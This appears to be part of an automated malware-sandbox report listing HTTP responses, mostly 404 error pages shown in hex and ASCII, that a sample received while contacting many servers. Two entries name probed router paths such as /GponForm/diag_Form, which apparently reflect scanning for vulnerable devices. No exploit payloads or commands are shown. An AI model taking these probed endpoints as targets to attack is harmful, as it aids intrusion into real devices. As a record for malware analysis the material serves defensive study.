Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Mon, 18 Mar 2024 08:59:44 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Mar 2024 17:10:48 GMTServer: Web ServerAccept-Ranges: bytesConnection: closeContent-Type: text/html; charset=ISO-8859-1Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 47 70 6f 6e 46 6f 72 6d 2f 64 69 61 67 5f 46 6f 72 6d 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>404 Not Found</H1>The requested URL /GponForm/diag_Form was not found on this server.</BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 18 Mar 2024 08:59:46 GMTContent-Type: text/htmlContent-Length: 134Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Mon, 18 Mar 2024 09:00:10 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/7.5X-Powered-By: ASP.NETDate: Mon, 18 Mar 2024 08:59:45 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon Mar 18 11:59:47 2024Server: tr069 http serverContent-Length: 15Connection: closeContent-Type: text/plain; charset=ISO-8859-1Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: File not found
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 18 Mar 2024 08:59:47 GMTContent-Type: text/htmlContent-Length: 134Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon Mar 18 11:59:47 2024Server: tr069 http serverContent-Length: 15Connection: closeContent-Type: text/plain; charset=ISO-8859-1Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: File not found
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 18 Mar 2024 08:59:48 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 18 Mar 2024 08:59:49 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Mar 2024 12:16:34 GMTServer: WebsX-Frame-Options: SAMEORIGINCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 341Connection: closeDate: Mon, 18 Mar 2024 08:59:49 GMTServer: lighttpd/1.4.54Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>404 Not Found</title> </head> <body> <h1>404 Not Found</h1> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 18 Mar 2024 08:59:51 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Mar 2024 08:59:53 GMTServer: Apache/2.4.57 (Debian)Content-Length: 271Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 37 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.57 (Debian) Server at 127.0.0.1 Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 18 Mar 2024 08:56:07 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Mar 2024 08:59:54 GMTServer: Apache/2.4.6 (Red Hat Enterprise Linux)Content-Length: 217Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Mon, 18 Mar 2024 08:59:54 GMTContent-Type: text/htmlContent-Length: 3971Connection: keep-aliveETag: "5d9bab28-f83"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 